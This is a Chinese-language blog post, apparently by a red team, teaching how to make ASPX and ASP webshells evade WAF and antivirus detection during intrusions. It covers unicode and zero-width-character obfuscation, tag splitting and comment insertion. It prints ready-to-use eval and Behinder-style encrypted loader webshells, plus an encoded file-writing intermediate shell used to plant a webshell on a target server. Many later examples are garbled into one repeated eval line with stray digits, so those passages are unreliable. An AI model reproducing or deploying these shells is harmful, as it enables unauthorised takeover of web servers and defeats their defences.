əhead@深蓝实验室重保天佑战队
前言
在攻防场景下,比如我们常常在找到某个上传接口,第一步肯定是先测试后缀是否有限制,第二步则是测试上传的文件是否能解析,最后便确认即将要上传的webshell内容是否有拦截。这里针对webshell内容拦截这块做了记录,下面先对aspx类型和asp类型这两块展开,希望能给大家作为参考。
一、Aspx类型
其中aspx类型中,我们可以利用下面列出的这些特性对内容作对应的处理,以达到免杀的目的
1、unicode编码
2、空字符串连接
3、<%%>截断
3、头部替换
5、特殊符号@
6、注释
1.unicode编码
例如"eval"他可以变为\u0065\u0076\u0061\u006C
那么如下例子可以转换为:
<%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c(@Request.Item["hello"],"unsafe");%>
在JScript的情况下它不支持大U和多个0的增加,但是在c#的情况下,是可以支持大U和多个0的增加。
2、空字符串连接
unicode是支持在aspx里进行的,同样的,它也支持asmx和ashx,估计这类特性都是通用的。并且在unicode有一类字符叫做零宽连字符(全称zero width joiner)。
在函数字符串中插入这些字符都不会影响脚本的正常运行,在测试前需要注意该类字符插入的位置,否则插入错误的地方会产生报错
\u200c
\u200d
\u200e
\u200f
除了上面的zero width joiner,还有一种unicode编码叫做零宽不折行空格,也就是如下几种字符,都支持在字符间进行拼接
\ufeff
\u202a
\u202b
\u202c
\u202d
\u202e
例子:
<%c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth);%>
3、使用<%%>语法
将整个字符串与函数利用多个<%%>进行分割
<%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c%><%(Request.%>
4、头部免杀
该字段可以放在后面,不一定要放前面
<%@Page Language="csharp"%>
<%@ Page Language="Jscript"%>
<%@Page Language=JS%>
<% @language="Csharp" %>
5、使用符号
可以添加@符号但是不会影响其解析
<%.@CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key))%>
6、注释插入
<%/*TreeObject*/./*TreeObject*/GetBytes(Session[0] + ""),%>
7、花括号和分号
{}和分号;在原本语法结束的地方可以添加大量的该类混淆,不会影响其原本的解析
<% @page language=c#%>;;;;;;;;;;;;;;;;;;;;
<%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b");{{{}}} byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);{{{;}}} Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);;;;;;;;;;;;;;;;;;;;;%>
8、aspx别的声明标签
在php中,解析引擎可以认识
<%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c(@Request.Item["hello"],"unsafe");%>0
aspx中也有类似的标签风格,如下:
<%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c(@Request.Item["hello"],"unsafe");%>1
<%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c(@Request.Item["hello"],"unsafe");%>2
9、换行特性
10、c#的 ///特性和xml
c#规定了/// 能够在aspx中作为xml语法的注释,那么在实际使用中,我们结合换行、unicode特性可以这样做,在如下内容中加入///充当注释:
<%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c(@Request.Item["hello"],"unsafe");%>3
那么这时我们综上所说到的这些特性,对冰蝎马进行免杀处理,可以得到如下内容:
<%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c(@Request.Item["hello"],"unsafe");%>4
同理,哥斯拉等其他的也可以按照这种方法作免杀处理。
二、ASP类型
可通过变量赋值替换,组合换行的方式进行免杀
比如常见的一句话通过变量赋值替换,即可免杀D盾
<%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c(@Request.Item["hello"],"unsafe");%>5
那么下面我们就可以利用这两个特性对冰蝎马进行免杀处理,同样得到如下内容:
<%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c(@Request.Item["hello"],"unsafe");%>6
ps:再补充一个之前在xx项目测试中,利用中间马的方式绕过waf写入webshell,大概原理就是先上传一个写文件功能的,利用该功能再往目标服务器写入webshell。
往当前目录写入TypeError.asp,文件内容为<%response.write("hello")%>
<%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c(@Request.Item["hello"],"unsafe");%>7
其中我们再定义两个函数用于混淆
<%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c(@Request.Item["hello"],"unsafe");%>8
ok,接下来我们再做一下数据处理
最后可以得到如下内容:
<%
<!--
<%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c(@Request.Item["hello"],"unsafe");%>8
eXecUTe(JXMD("83-101-114-118-101-114-46-67-114-101-97-116-101-79-98-106-101-99-116-40-34-83-99-114-105-112-116-105-110-103-46-70-105-108-101-83-121-115-116-101-109-79-98-106-101-99-116-34-41-46-79-112-101-110-84-101-120-116-70-105-108-101-40-83-101-114-118-101-114-46-77-97-112-80-97-116-104-40-34-84-121-112-101-69-114-114-111-114-46-97-115-112-34-41-44-50-44-84-114-117-101-41-46-87-114-105-116-101-76-105-110-101-40-72-101-120-84-111-83-116-114-40-34-51-99-50-53-55-50-54-53-55-51-55-48-54-102-54-101-55-51-54-53-50-101-55-55-55-50-54-57-55-52-54-53-50-56-50-50-54-56-54-53-54-99-54-99-54-102-50-50-50-57-50-53-51-101-34-41-41"))
-->
%>
同样也是具有免杀效果的
这里可以看到访问02.asp成功往目标服务器当前目录写入预先内容的TypeError.asp
利用这种方式,我们便可以绕过waf往目标写入webshell,从而获取服务器权限。
同理,aspx类型的也可以利用这种方式尝试绕过waf写入对应的webshell。
还没有评论,来说两句吧...